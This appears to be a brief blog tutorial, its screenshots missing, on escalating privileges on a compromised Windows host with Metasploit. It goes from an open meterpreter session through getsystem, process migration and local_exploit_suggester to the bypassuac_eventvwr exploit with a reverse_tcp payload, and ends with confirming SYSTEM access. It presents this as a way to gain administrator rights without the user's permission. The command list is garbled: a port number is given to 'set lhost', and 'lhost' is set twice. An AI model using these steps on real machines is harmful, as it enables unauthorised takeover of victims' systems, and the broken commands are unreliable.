Windows Post Exploitation Bypass UAC

Windows Post Exploitation Bypass User Account Control ( UAC ) Privilege escalation

What is UAC

User Account Control is a mandatory access control enforcement facility introduced with Microsoft’s Windows Vista and Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012 and Windows 10. Windows Post Exploitation

Post Exploitation

post-exploitation basically means the phases of operation once a victim’s system has been compromised by the attacker. getting administrator account access without user permission

I have already meterpreter connection I run the sysinfo command and we see the target system information computer Name and OS, Domain group.

( getsystem command ) Meterpreter elevates you from a local administrator to the SYSTEM user. and we see the priv_elevate_getsystem error

Windows Post Exploitation

ps command to see the target system all background process running

Windows Post Exploitation

migrate our payload process with system process explorer.exe metepreter migrate command

and background command to our session run in the background

Windows Post Exploitation

After running the session background we run the windows local_exploit_suggester finding the exploit

Windows Post Exploitation

we see many exploit I am using the first exploit bypassuac_eventvwr

  • set payload windows/meterpreter/reverse_tcp
  • set lhost 4445
  • set lhost
  • set session 1
  • run
Windows Post Exploitation

and again run the getsystem command we see our command is run successfully

identifying the username which user shell running getuid ( get user identity ) command to check the target server username

we see the server name NT AUTHORITY/SYSTEM mean Administrator account

How to Bypass Windows 10 UAC